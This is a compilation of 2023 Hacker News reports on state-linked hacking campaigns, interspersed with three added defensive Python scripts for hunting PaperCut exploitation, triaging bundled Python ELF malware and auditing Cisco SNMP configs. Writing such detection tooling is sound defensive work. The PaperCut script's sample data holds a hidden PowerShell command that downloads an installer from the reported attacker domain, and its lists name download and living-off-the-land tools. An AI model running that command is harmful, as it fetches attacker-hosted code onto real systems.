Kaspersky's investigation of the attacks has further identified overlaps with a Turla cluster tracked by Google-owned Mandiant under the name UNC4210, uncovering that the QUIETCANARY (aka TunnusSched) implant had been deployed against a government target in the CIS by means of Telemiris.
"More precisely, on September 13, 2022, around 05:40 UTC, an operator attempted to deploy several known Tomiris implants via Telemiris: first a Python Meterpreter loader, then JLORAT and Roopy," the researchers explained.
"These efforts were thwarted by security products, which led the attacker to make repeated attempts, from various locations on the filesystem. All these attempts ended in failure. After a one-hour pause, the operator tried again at 07:19 UTC, this time using a TunnusSched/QUIETCANARY sample. The TunnusSched sample was blocked as well."
That said, despite the potential ties between the two groups, Tomiris is said to be separate from Turla owing to differences in their targeting and tradecrafts, once again raising the possibility of a false flag operation.
On the other hand, it's also highly probable that Turla and Tomiris collaborate on select operations or that both the actors rely on a common software provider, as exemplified by Russian military intelligence agencies' use of tools supplied by a Moscow-based IT contractor named NTC Vulkan.
"Overall, Tomiris is a very agile and determined actor, open to experimentation," the researchers said, adding "there exists a form of deliberate cooperation between Tomiris and Turla."
Russian Hackers Suspected in Ongoing Exploitation of Unpatched PaperCut Servers
24.4.23 BigBrothers The Hacker News
Print management software provider PaperCut said that it has "evidence to suggest that unpatched servers are being exploited in the wild," citing two vulnerability reports from cybersecurity company Trend Micro.
"PaperCut has conducted analysis on all customer reports, and the earliest signature of suspicious activity on a customer server potentially linked to this vulnerability is 14th April 01:29 AEST / 13th April 15:29 UTC," it further added.
The update comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a critical improper access control flaw (CVE-2023-27350, CVSS score: 9.8) in PaperCut MF and NG to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
Cybersecurity company Huntress, which found about 1,800 publicly exposed PaperCut servers, said it observed PowerShell commands being spawned from PaperCut software to install remote monitoring and management (RMM) software like Atera and Syncro for persistent access and code execution on the infected hosts.
Additional infrastructure analysis has revealed the domain hosting the tools – windowservicecemter[.]com – was registered on April 12, 2023, also hosting malware like TrueBot, although the company said it did not directly detect the deployment of the downloader.
TrueBot is attributed to a Russian criminal entity known as Silence, which in turn has historical links with Evil Corp and its overlapping cluster TA505, the latter of which has facilitated the distribution of Cl0p ransomware in the past.
"While the ultimate goal of the current activity leveraging PaperCut's software is unknown, these links (albeit somewhat circumstantial) to a known ransomware entity are concerning," Huntress researchers said.
"Potentially, the access gained through PaperCut exploitation could be used as a foothold leading to follow-on movement within the victim network, and ultimately ransomware deployment."
Users are recommended to upgrade to the fixed versions of PaperCut MF and NG (20.1.7, 21.2.11, and 22.0.9) as soon as possible, regardless of whether the server is "available to external or internal connections," to mitigate potential risks.
Customers who are unable to upgrade to a security patch are advised to lock down network access to the servers by blocking all inbound traffic from external IPs and limiting IP addresses to only those belonging to verified site servers.
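The two things a defender wants from the PaperCut reports above are a quick way to tell whether a server is on a fixed release and a hunt for the behaviour Huntress described (an interpreter or RMM installer spawned by the print server process). The following is an added example written for this page, not PaperCut's or Huntress's code. It assumes the PaperCut application server runs as pc-app.exe and that process-creation telemetry is available in a Sysmon-like shape (parent image, image, command line); the event records and the list of suspicious child processes are constructed for the example, and only the fixed versions and the staging domain come from the text above.

```python
"""Triage helpers for the PaperCut MF/NG CVE-2023-27350 activity.

Added example (not vendor or Huntress code). Assumptions, labelled here and
below: the PaperCut server process is pc-app.exe; telemetry is a list of
dicts with parent_image / image / command_line; the sample events are
constructed for this example.
"""
import re

# Fixed versions named in the vendor advisory, keyed by release branch.
FIXED_VERSIONS = {20: (20, 1, 7), 21: (21, 2, 11), 22: (22, 0, 9)}


def parse_version(text):
    return tuple(int(p) for p in text.strip().split("."))


def is_patched(version_text):
    """True if the version is at or above the fixed release for its branch.

    Returns None for branches the advisory on this page does not list, so a
    caller cannot mistake "not covered" for "safe" (assumption: unlisted
    branches need manual review rather than an automatic verdict).
    """
    v = parse_version(version_text)
    fixed = FIXED_VERSIONS.get(v[0])
    if fixed is None:
        return None
    return v >= fixed


# Interpreters / LOLBins that a print server has no business launching
# (assumed list; extend to taste).
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe",
                       "mshta.exe", "certutil.exe", "curl.exe", "bitsadmin.exe"}
# RMM products named in the report plus the staging domain it identified.
RMM_PATTERN = re.compile(r"(atera|syncro|windowservicecemter\.com)", re.IGNORECASE)


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify_event(ev):
    """Return the reasons an event is suspicious (empty list if benign)."""
    reasons = []
    parent, child = basename(ev["parent_image"]), basename(ev["image"])
    if parent == "pc-app.exe" and child in SUSPICIOUS_CHILDREN:
        reasons.append(f"{child} spawned by PaperCut server process")
    if RMM_PATTERN.search(ev.get("command_line", "")):
        reasons.append("RMM installer or known staging domain in command line")
    return reasons


def hunt(events):
    """Run classify_event over telemetry; return (child image, reasons) hits."""
    hits = []
    for ev in events:
        reasons = classify_event(ev)
        if reasons:
            hits.append((basename(ev["image"]), reasons))
    return hits


SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"parent_image": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"iwr http://windowservicecemter.com/setup.msi -OutFile $env:TEMP\\a.msi\""},
    {"parent_image": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "image": r"C:\Program Files\PaperCut MF\server\bin\win\pc-web-print.exe",
     "command_line": "pc-web-print.exe"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-Date"},
]

if __name__ == "__main__":
    for image, reasons in hunt(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
    for v in ("22.0.8", "22.0.9", "21.2.11", "20.1.6", "19.0.4"):
        print(v, is_patched(v))
```

Only the first constructed event fires, on both rules: the parent/child pairing and the staging domain. The legitimate PaperCut helper process and an interactive PowerShell under explorer.exe stay quiet, which is the point of keying the rule on the parent rather than on PowerShell alone.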
CISA Adds 3 Actively Exploited Flaws to KEV Catalog, including Critical PaperCut Bug
22.4.23 BigBrothers The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The three vulnerabilities are as follows -
CVE-2023-28432 (CVSS score - 7.5) - MinIO Information Disclosure Vulnerability
CVE-2023-27350 (CVSS score - 9.8) - PaperCut MF/NG Improper Access Control Vulnerability
CVE-2023-2136 (CVSS score - TBD) - Google Chrome Skia Integer Overflow Vulnerability
"In a cluster deployment, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure," MinIO maintainers said in an advisory published on March 21, 2023.
Data gathered by GreyNoise shows that as many as 18 unique malicious IP addresses from the U.S., the Netherlands, France, Japan, and Finland have attempted to exploit the flaw over the past 30 days.
The threat intelligence company, in an alert published late last month, also noted how a reference implementation provided by OpenAI for developers to integrate their plugins to ChatGPT relied on an older version of MinIO that's vulnerable to CVE-2023-28432.
"While the new feature released by OpenAI is a valuable tool for developers who want to access live data from various providers in their ChatGPT integration, security should remain a core design principle," GreyNoise said.
Also added to the KEV catalog is a critical remote code execution bug affecting PaperCut print management software that allows remote attackers to bypass authentication and run arbitrary code.
The vulnerability has been addressed by the vendor as of March 8, 2023, with the release of PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11, and 22.0.9. Zero Day Initiative, which reported the issue on January 10, 2023, is expected to release additional technical details on May 10, 2023.
According to an update shared by the Melbourne-based company earlier this week, evidence of active exploitation of unpatched servers emerged in the wild around April 18, 2023.
Cybersecurity firm Arctic Wolf said it "has observed intrusion activity associated with a vulnerable PaperCut Server where the RMM tool Syncro MSP was loaded onto a victim system."
Lastly added to the list of actively exploited flaws is a Google Chrome vulnerability affecting the Skia 2D graphics library that could enable a threat actor to perform a sandbox escape via a crafted HTML page.
Federal Civilian Executive Branch (FCEB) agencies in the U.S. are recommended to remediate identified vulnerabilities by May 12, 2023, to secure their networks against active threats.
Daggerfly Cyberattack Campaign Hits African Telecom Services Providers
20.4.23 BigBrothers The Hacker News
Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022.
The intrusions have been pinned on a hacking crew tracked by Symantec as Daggerfly, which is also tracked by the broader cybersecurity community as Bronze Highland and Evasive Panda.
The campaign makes use of "previously unseen plugins from the MgBot malware framework," the cybersecurity company said in a report shared with The Hacker News. "The attackers were also seen using a PlugX loader and abusing the legitimate AnyDesk remote desktop software."
Daggerfly's use of the MgBot loader (aka BLame or MgmBot) was spotlighted by Malwarebytes in July 2020 as part of phishing attacks aimed at Indian government personnel and individuals in Hong Kong.
According to a profile published by Secureworks, the threat actor uses spear-phishing as an initial infection vector to drop MgBot as well as other tools like Cobalt Strike, a legitimate adversary simulation software, and an Android-based remote access trojan (RAT) named KsRemote.
The group is suspected of conducting espionage activities against domestic human rights and pro-democracy advocates and nations neighboring China as far back as 2014.
Attack chains analyzed by Symantec show the use of living-off-the-land (LotL) tools like BITSAdmin and PowerShell to deliver next-stage payloads, including a legitimate AnyDesk executable and a credential harvesting utility.
The threat actor subsequently moves to set up persistence on the victim system by creating a local account and deploys the MgBot modular framework, which comes with a wide range of plugins to harvest browser data, log keystrokes, capture screenshots, record audio, and enumerate the Active Directory service.
"All of these capabilities would have allowed the attackers to collect a significant amount of information from victim machines," Symantec said. "The capabilities of these plugins also show that the main goal of the attackers during this campaign was information-gathering."
The all-encompassing nature of MgBot indicates that it's actively maintained and updated by the operators to obtain access to victim environments.
The disclosure arrives almost a month after SentinelOne detailed a campaign called Tainted Love in Q1 2023 aimed at telecommunication providers in the Middle East. It was attributed to a Chinese cyberespionage group that shares overlaps with Gallium (aka Othorene).
Symantec further said it identified three additional victims of the same activity cluster that are located in Asia and Africa. Two of the victims, which were breached in November 2022, are subsidiaries of a telecom firm in the Middle East region.
"Telecoms companies will always be a key target in intelligence gathering campaigns due to the access they can potentially provide to the communications of end-users," Symantec said.
Google TAG Warns of Russian Hackers Conducting Phishing Attacks in Ukraine
20.4.23 BigBrothers The Hacker News
Elite hackers associated with Russia's military intelligence service have been linked to large-volume phishing campaigns aimed at hundreds of users in Ukraine to extract intelligence and influence public discourse related to the war.
Google's Threat Analysis Group (TAG), which is monitoring the activities of the actor under the name FROZENLAKE, said the attacks continue the "group's 2022 focus on targeting webmail users in Eastern Europe."
The state-sponsored cyber actor, also tracked as APT28, Fancy Bear, Forest Blizzard, Iron Twilight, Sednit, and Sofacy, is both highly active and proficient. It has been active since at least 2009, targeting media, governments, and military entities for espionage.
The latest intrusion set, starting in early February 2023, involved the use of reflected cross-site scripting (XSS) attacks on various Ukrainian government websites to redirect users to phishing domains and capture their credentials.
The disclosure comes as U.K. and U.S. intelligence and law enforcement agencies released a joint advisory warning of APT28's attacks exploiting an old, known vulnerability in Cisco routers to deploy malware known as Jaguar Tooth.
FROZENLAKE is far from the only actor focused on Ukraine since Russia's military invasion of the country over a year ago. Another notable adversarial collective is FROZENBARENTS – aka Sandworm, Seashell Blizzard (née Iridium), or Voodoo Bear – which has engaged in a sustained effort to target organizations affiliated to the Caspian Pipeline Consortium (CPC) and other energy sector entities in Eastern Europe.
Both groups have been attributed to the General Staff Main Intelligence Directorate (GRU), with APT28 tied to the 85th Special Service Center (GTsSS) military intelligence unit 26165. Sandworm, on the other hand, is believed to be part of GRU's Unit 74455.
The credential harvesting campaign targeted CPC employees with phishing links delivered via SMS. The attacks against the energy vertical distributed links to fake Windows update packages that ultimately executed an information stealer known as Rhadamanthys to exfiltrate passwords and browser cookies.
FROZENBARENTS, dubbed the "most versatile GRU cyber actor," has also been observed launching credential phishing attacks targeting the Ukrainian defense industry, military, and Ukr.net webmail users beginning in early December 2022.
The threat actor is said to have further created online personas across YouTube, Telegram, and Instagram to disseminate pro-Russian narratives, leak data stolen from compromised organizations, and post targets for distributed denial-of-service (DDoS) attacks.
"FROZENBARENTS has targeted users associated with popular channels on Telegram," TAG researcher Billy Leonard said. "Phishing campaigns delivered via email and SMS spoofed Telegram to steal credentials, sometimes targeting users following pro-Russia channels."
A third threat actor of interest is PUSHCHA (aka Ghostwriter or UNC1151), a Belarusian government-backed group that's known to act on behalf of Russian interests and which carried out targeted phishing attacks singling out Ukrainian webmail providers such as i.ua and meta.ua to siphon credentials.
Lastly, Google TAG also highlighted a set of attacks mounted by the group behind Cuba ransomware to deploy RomCom RAT in Ukrainian government and military networks.
"This represents a large shift from this actor's traditional ransomware operations, behaving more similarly to an actor conducting operations for intelligence collection," Leonard pointed out.
The development also follows a new alert from the U.K. National Cyber Security Centre (NCSC) about emerging threats to critical national infrastructure organizations from state-aligned groups, particularly those that are "sympathetic" to Russia's invasion of Ukraine.
"These groups are not motivated by financial gain, nor subject to control by the state, and so their actions can be less predictable and their targeting broader than traditional cyber crime actors," the agency said.
Pakistani Hackers Use Linux Malware Poseidon to Target Indian Government Agencies
19.4.23 BigBrothers The Hacker News
The Pakistan-based advanced persistent threat (APT) actor known as Transparent Tribe has abused a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon.
"Poseidon is a second-stage payload malware associated with Transparent Tribe," Uptycs security researcher Tejaswini Sandapolla said in a technical report published this week.
"It is a general-purpose backdoor that provides attackers with a wide range of capabilities to hijack an infected host. Its functionalities include logging keystrokes, taking screen captures, uploading and downloading files, and remotely administering the system in various ways."
Transparent Tribe is also tracked as APT36, Operation C-Major, PROJECTM, and Mythic Leopard, and has a track record of targeting Indian government organizations, military personnel, defense contractors, and educational entities.
It has also repeatedly leveraged trojanized versions of Kavach, the Indian government-mandated 2FA software, to deploy a variety of malware, such as CrimsonRAT and LimePad, to harvest valuable information.
Another phishing campaign detected late last year took advantage of weaponized attachments to download malware designed to exfiltrate database files created by the Kavach app.
The latest set of attacks entails the use of a backdoored version of Kavach to target Linux users working for Indian government agencies, indicating attempts by the threat actor to expand its attack spectrum beyond the Windows and Android ecosystems.
"When a user interacts with the malicious version of Kavach, the genuine login page is displayed to distract them," Sandapolla explained. "Meanwhile, the payload is downloaded in the background, compromising the user's system."
The starting point of the infections is an ELF malware sample, a compiled Python executable that's engineered to retrieve the second-stage Poseidon payload from a remote server.
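A first-stage ELF that is really a bundled Python program is easy to spot once you know what the bundler leaves behind. The following triage check is an added example written for this page, not Uptycs' tooling. It assumes the bundler is PyInstaller (the text above says only "compiled Python executable"), whose appended archive ends in an 88-byte cookie beginning with the bytes MEI\x0c\x0b\x0a\x0b\x0e; the layout of that cookie and the string hints are stated from general knowledge of PyInstaller, not from the report, and the "samples" are built in memory for the example rather than being real Poseidon files.

```python
"""Triage check for a PyInstaller-bundled Python ELF (added example, not
Uptycs' code). Assumptions: PyInstaller is the bundler; its CArchive cookie is
88 bytes laid out as magic(8) pkg_len(4) toc_pos(4) toc_len(4) pyvers(4)
pylib_name(64), big-endian. Sample inputs below are constructed.
"""
import struct

ELF_MAGIC = b"\x7fELF"
PYINSTALLER_COOKIE = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FORMAT = "!8sIIii64s"          # assumed PyInstaller cookie layout
COOKIE_SIZE = struct.calcsize(COOKIE_FORMAT)  # 88
PYTHON_HINTS = (b"libpython", b"_MEIPASS", b"PyInstaller", b"Py_Initialize")


def triage(blob):
    """Describe whether the bytes look like a bundled Python ELF.

    Uses rfind because on Linux PyInstaller may place the archive in a
    'pydata' section rather than strictly at end-of-file.
    """
    is_elf = blob[:4] == ELF_MAGIC
    cookie_at = blob.rfind(PYINSTALLER_COOKIE)
    hints = [h.decode() for h in PYTHON_HINTS if h in blob]
    info = {
        "elf": is_elf,
        "pyinstaller": cookie_at != -1,
        "python_hints": hints,
        "verdict": "bundled Python ELF" if is_elf and (cookie_at != -1 or hints) else "other",
    }
    if cookie_at != -1 and len(blob) >= cookie_at + COOKIE_SIZE:
        _, pkg_len, toc_pos, toc_len, pyvers, libname = struct.unpack_from(
            COOKIE_FORMAT, blob, cookie_at)
        # Newer PyInstaller encodes major*100+minor (311 = 3.11); older
        # releases used major*10+minor (37 = 3.7). Both are handled here.
        if pyvers >= 100:
            info["python_version"] = f"{pyvers // 100}.{pyvers % 100}"
        else:
            info["python_version"] = f"{pyvers // 10}.{pyvers % 10}"
        info["archive_len"] = pkg_len
        info["toc"] = (toc_pos, toc_len)
        info["pylib"] = libname.rstrip(b"\x00").decode(errors="replace")
    return info


def build_fake_sample(bundled):
    """Construct a minimal ELF-looking blob, optionally with a PyInstaller
    tail. Constructed test data only; not a real executable."""
    body = bytearray(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 200)
    if bundled:
        body += b"\x00" * 64 + b"_MEIPASS\x00libpython3.11.so\x00"
        body += struct.pack(COOKIE_FORMAT, PYINSTALLER_COOKIE, 4096, 3800, 296, 311,
                            b"libpython3.11.so.1.0".ljust(64, b"\x00"))
    return bytes(body)


if __name__ == "__main__":
    for bundled in (True, False):
        print(triage(build_fake_sample(bundled)))
```

A hit here justifies the next step a practitioner would actually take, extracting the archive and decompiling the entry script to recover the C2 address, rather than spending time on the ELF wrapper itself.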
The cybersecurity firm noted that the fake Kavach apps are primarily distributed through rogue websites that are disguised as legitimate Indian government sites. This includes www.ksboard[.]in and www.rodra[.]in.
With social engineering being the primary attack vector used by Transparent Tribe, users working within the Indian government are advised to double-check URLs received in emails before opening them.
"Repercussions of this APT36 attack could be significant, leading to loss of sensitive information, compromised systems, financial losses, and reputational damage," Sandapolla said.
U.S. and U.K. Warn of Russian Hackers Exploiting Cisco Router Flaws for Espionage
19.4.23 BigBrothers The Hacker News
U.K. and U.S. cybersecurity and intelligence agencies have warned of Russian nation-state actors exploiting now-patched flaws in networking equipment from Cisco to conduct reconnaissance and deploy malware against targets.
The intrusions, per the authorities, took place in 2021 and targeted a small number of entities in Europe, U.S. government institutions, and about 250 Ukrainian victims.
The activity has been attributed to a threat actor tracked as APT28, which is also known as Fancy Bear, Forest Blizzard (formerly Strontium), FROZENLAKE, and Sofacy, and is affiliated with the Russian General Staff Main Intelligence Directorate (GRU).
"APT28 has been known to access vulnerable routers by using default and weak SNMP community strings, and by exploiting CVE-2017-6742," the National Cyber Security Centre (NCSC) said.
CVE-2017-6742 (CVSS score: 8.8) is part of a set of remote code execution flaws that stem from a buffer overflow condition in the Simple Network Management Protocol (SNMP) subsystem in Cisco IOS and IOS XE Software.
In the attacks observed by the agencies, the threat actor weaponized the vulnerability to deploy a non-persistent malware dubbed Jaguar Tooth on Cisco routers that's capable of gathering device information and enabling unauthenticated backdoor access.
While the issues were patched in June 2017, they have since come under public exploitation as of January 11, 2018, underscoring the need for robust patch management practices to limit the attack surface.
Besides updating to the latest firmware to mitigate potential threats, the company is also recommending that users switch from SNMP to NETCONF or RESTCONF for network management.
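The access path the advisory describes, default or weak SNMP community strings with no access list in front of them, is something you can audit offline from a saved running-config before anyone reaches the router. The script below is an added example written for this page, not Cisco's or NCSC's tooling. The weak-string list, the 12-character length threshold and the two config snippets are constructed for the example; the Cisco IOS command syntax it parses (snmp-server community, snmp-server group ... v3 priv, netconf-yang, restconf) is standard.

```python
"""Offline audit of SNMP settings in a Cisco IOS / IOS XE running-config.

Added example, not vendor tooling. Flags default/weak community strings,
communities reachable without an ACL, read-write communities, and the absence
of SNMPv3 authPriv or a NETCONF/RESTCONF alternative. Weak-string list and
length threshold are assumptions; config text below is constructed.
"""
import re

DEFAULT_COMMUNITIES = {"public", "private", "cisco", "admin", "community", "snmp"}
MIN_COMMUNITY_LEN = 12  # assumed policy threshold

# snmp-server community <string> [view <name>] [RO|RW] [ipv6 <acl>] [<acl>]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (\S+)(?: view \S+)?(?: (RO|RW))?(?: ipv6 \S+)?(?: (\S+))?\s*$")
V3_GROUP_RE = re.compile(r"^snmp-server group \S+ v3 (auth|priv)\b")


def audit_snmp(config_text):
    """Return a list of findings (empty list means nothing to report)."""
    findings = []
    has_v3 = False
    has_netconf = False
    for raw in config_text.splitlines():
        line = raw.strip()
        m = COMMUNITY_RE.match(line)
        if m:
            community, mode, acl = m.group(1), m.group(2) or "RO", m.group(3)
            if community.lower() in DEFAULT_COMMUNITIES:
                findings.append(f"default/weak community '{community}' ({mode})")
            elif len(community) < MIN_COMMUNITY_LEN:
                findings.append(f"short community '{community}' ({mode}) is guessable")
            if acl is None:
                findings.append(f"community '{community}' has no ACL: reachable from any source")
            if mode == "RW":
                findings.append(f"community '{community}' grants write access; remove or restrict")
        if V3_GROUP_RE.match(line):
            has_v3 = True
        if line in ("netconf-yang", "restconf"):
            has_netconf = True
    if not has_v3 and not has_netconf:
        findings.append("no SNMPv3 auth/priv group and no NETCONF/RESTCONF: "
                        "only v1/v2c community strings protect management access")
    return findings


# Constructed examples: the 'before' an advisory like this one is warning about,
# and a hardened equivalent.
WEAK_CONFIG = """\
hostname edge-rtr-01
snmp-server community public RO
snmp-server community private RW
snmp-server location DC1
"""

HARDENED_CONFIG = """\
hostname edge-rtr-01
access-list 99 permit 10.0.50.0 0.0.0.255
snmp-server community Xk7#vQ9!mR2pLz4w RO 99
snmp-server group NETOPS-V3 v3 priv access 99
snmp-server user monitor NETOPS-V3 v3 auth sha AuthPass123! priv aes 128 PrivPass456!
netconf-yang
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {name} ==")
        for f in audit_snmp(cfg) or ["no findings"]:
            print(" -", f)
```

Run it against configs pulled by your normal backup job; a single ACL-less community line is enough to satisfy the first half of the advisory's description of how the routers were reached, independent of whether CVE-2017-6742 has been patched.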
Cisco Talos, in a coordinated advisory, said the attacks are part of a broader campaign against aging networking appliances and software from a variety of vendors to "advance espionage objectives or pre-position for future destructive activity."
This includes the installation of malicious software into an infrastructure device, attempts to surveil network traffic, and attacks mounted by "adversaries with preexisting access to internal environments targeting TACACS+/RADIUS servers to obtain credentials."
The alert comes months after the U.S. government sounded the alarm about China-based state-sponsored cyber actors leveraging network vulnerabilities to exploit public and private sector organizations since at least 2020.
Then earlier this year, Google-owned Mandiant highlighted efforts undertaken by Chinese state-sponsored threat actors to deploy bespoke malware on vulnerable Fortinet and SonicWall devices.
"Advanced cyber espionage threat actors are taking advantage of any technology available to persist and traverse a target environment, especially those technologies that do not support [endpoint detection and response] solutions," Mandiant said.
Iranian Government-Backed Hackers Targeting U.S. Energy and Transit Systems
19.4.23 BigBrothers The Hacker News
An Iranian government-backed actor known as Mint Sandstorm has been linked to attacks aimed at critical infrastructure in the U.S. between late 2021 and mid-2022.
"This Mint Sandstorm subgroup is technically and operationally mature, capable of developing bespoke tooling and quickly weaponizing N-day vulnerabilities, and has demonstrated agility in its operational focus, which appears to align with Iran's national priorities," the Microsoft Threat Intelligence team said in an analysis.
Targeted entities consist of seaports, energy companies, transit systems, and a major U.S. utility and gas company. The activity is suspected to be retaliatory and in response to attacks targeting its maritime, railway, and gas station payment systems that took place between May 2020 and late 2021.
It's worth noting here that Iran subsequently accused Israel and the U.S. of masterminding the attacks on the gas stations in a bid to create unrest in the nation.
Mint Sandstorm is the new name assigned to the threat actor Microsoft was previously tracking under the name Phosphorus, and also known as APT35, Charming Kitten, ITG18, TA453, and Yellow Garuda.
The change in nomenclature is part of Microsoft's shift from chemical elements-inspired monikers to a new weather-themed threat actor naming taxonomy, in part driven by the increasing "complexity, scale, and volume of threats."
Unlike MuddyWater (aka Mercury or Mango Sandstorm), which is known to operate on behalf of Iran's Ministry of Intelligence and Security (MOIS), Mint Sandstorm is said to be associated with Islamic Revolutionary Guard Corps (IRGC).
The attacks detailed by Redmond demonstrate the adversary's ability to constantly refine its tactics as part of highly-targeted phishing campaigns to obtain access to targeted environments.
This includes rapid adoption of publicly disclosed proof-of-concepts (PoCs) linked to flaws in internet-facing applications (e.g., CVE-2022-47966 and CVE-2022-47986) into their playbooks for initial access and persistence.
A successful breach is followed by the deployment of a custom PowerShell script, which is then used to activate one of the two attack chains, the first of which relies on additional PowerShell scripts to connect to a remote server and steal Active Directory databases.
The other sequence entails the use of Impacket to connect to an actor-controlled server and deploy bespoke implants called Drokbk and Soldier, with the latter being a multistage .NET backdoor with the ability to download and run tools and uninstall itself.
Drokbk was previously detailed by Secureworks Counter Threat Unit (CTU) in December 2022, attributing it to a threat actor known as Nemesis Kitten (aka Cobalt Mirage, TunnelVision, or UNC2448), a sub-cluster of Mint Sandstorm.
Microsoft also called out the threat actor for conducting low-volume phishing campaigns that culminate in the use of a third custom and modular backdoor referred to as CharmPower, a PowerShell-based malware that can read files, gather host information, and exfiltrate the data.
"Capabilities observed in intrusions attributed to this Mint Sandstorm subgroup are concerning as they allow operators to conceal C2 communication, persist in a compromised system, and deploy a range of post-compromise tools with varying capabilities," the tech giant added.
Pakistan-based Transparent Tribe Hackers Targeting Indian Educational Institutions
14.4.23 BigBrothers The Hacker News
The Transparent Tribe threat actor has been linked to a set of weaponized Microsoft Office documents in intrusions directed against the Indian education sector to deploy a continuously maintained piece of malware called Crimson RAT.
While the suspected Pakistan-based threat group is known to target military and government entities in the country, the activities have since expanded to include the education vertical.
The hacking group, also called APT36, Operation C-Major, PROJECTM, and Mythic Leopard, has been active as far back as 2013. Educational institutions have been at the receiving end of the adversary's attacks since late 2021.
"Crimson RAT is a consistent staple in the group's malware arsenal the adversary uses in its campaigns," SentinelOne researcher Aleksandar Milenkoski said in a report shared with The Hacker News.
The .NET malware has the functionality to exfiltrate files and system data to an actor-controlled server. It's also built with the ability to capture screenshots, terminate running processes, and download and execute additional payloads to log keystrokes and steal browser credentials.
Last month, ESET attributed Transparent Tribe to a cyber espionage campaign aimed at infecting Indian and Pakistani Android users with a backdoor called CapraRAT.
An analysis of Crimson RAT samples has revealed the presence of the word "Wibemax," corroborating a previous report from Fortinet. While the name matches that of a Pakistani software development company, it's not immediately clear if it shares any direct connection to the threat actor.
That said, it bears noting that Transparent Tribe has in the past leveraged infrastructure operated by a web hosting provider called Zain Hosting in attacks targeting the Indian education sector.
The documents analyzed by SentinelOne feature education-themed content and names like assignment or Assignment-no-10, and make use of malicious macro code to launch the Crimson RAT. Another method concerns the use of OLE embedding to stage the malware.
"Malicious documents that implement this technique require users to double-click a document element," Milenkoski explained. "These documents distributed by Transparent Tribe typically display an image (a 'View Document' graphic) indicating that the document content is locked."
This, in turn, tricks users into double-clicking the graphic to view the content, thereby activating an OLE package that stores and executes the Crimson RAT masquerading as an update process.
Crimson RAT variants have also been observed to delay their execution for a specific time period spanning anywhere between a minute and four minutes, not to mention implement different obfuscation techniques using tools like Crypto Obfuscator and Eazfuscator.
"Transparent Tribe is a highly motivated and persistent threat actor that regularly updates its malware arsenal, operational playbook, and targets," Milenkoski said. "Transparent Tribe's constantly changing operational and targeting strategies require constant vigilance to mitigate the threat posed by the group."
Estonian National Charged in U.S. for Acquiring Electronics and Metasploit Pro for Russian Military
11.4.23 BigBrothers The Hacker News
An Estonian national has been charged in the U.S. for purchasing U.S.-made electronics on behalf of the Russian government and military.
The 45-year-old individual, Andrey Shevlyakov, was arrested on March 28, 2023, in Tallinn. He has been indicted with 18 counts of conspiracy and other charges. If found guilty, he faces up to 20 years in prison.
Court documents allege that Shevlyakov operated front companies that were used to import sensitive electronics from U.S. manufacturers. The goods were then shipped to Russia, bypassing export restrictions.
The purchased items included analog-to-digital converters and low-noise pre-scalers and synthesizers that are found in defense systems. Shevlyakov is also accused of attempting to acquire hacking tools like Rapid7 Metasploit Pro, a legitimate penetration testing and adversary simulation software.
Although Shevlyakov was placed in Entity List in 2012 by the U.S. government for acting as a procurement agent for Russia, he is said to have used "false names and a web of front companies" to sidestep the regulations and run an "intricate logistics operation involving frequent smuggling trips across the Russian border."
Shevlyakov is estimated to have exported at least $800,000 worth of items from U.S. electronics manufacturers and distributors between about October 2012 and January 2022 through his shell companies like Yaxart, Anmarna, and Marnik.
"As alleged, for more than a decade, the defendant has been acquiring sensitive electronics from U.S. manufacturers on behalf of the Russian government, in defiance of U.S. export controls," U.S. Attorney Breon Peace said.
CISA Warns of 5 Actively Exploited Security Flaws: Urgent Action Required
11.4.23 BigBrothers The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.
This includes three high-severity flaws in the Veritas Backup Exec Agent software (CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878) that could lead to the execution of privileged commands on the underlying system. The flaws were fixed in a patch released by Veritas in March 2021.
CVE-2021-27876 (CVSS score: 8.1) - Veritas Backup Exec Agent File Access Vulnerability
CVE-2021-27877 (CVSS score: 8.2) - Veritas Backup Exec Agent Improper Authentication Vulnerability
CVE-2021-27878 (CVSS score: 8.8) - Veritas Backup Exec Agent Command Execution Vulnerability
Google-owned Mandiant, in a report published last week, revealed that an affiliate associated with the BlackCat (aka ALPHV and Noberus) ransomware operation is targeting publicly exposed Veritas Backup Exec installations to gain initial access by leveraging the aforementioned three bugs.
The threat intelligence firm, which is tracking the affiliate actor under its uncategorized moniker UNC4466, said it first observed exploitation of the flaws in the wild on October 22, 2022.
In one incident detailed by Mandiant, UNC4466 gained access to an internet-exposed Windows server, followed by carrying out a series of actions that allowed the attacker to deploy the Rust-based ransomware payload, but not before conducting reconnaissance, escalating privileges, and disabling Microsoft Defender's real-time monitoring capability.
Also added by CISA to the KEV catalog is CVE-2019-1388 (CVSS score: 7.8), a privilege escalation flaw impacting Microsoft Windows Certificate Dialog that could be exploited to run processes with elevated permissions on an already compromised host.
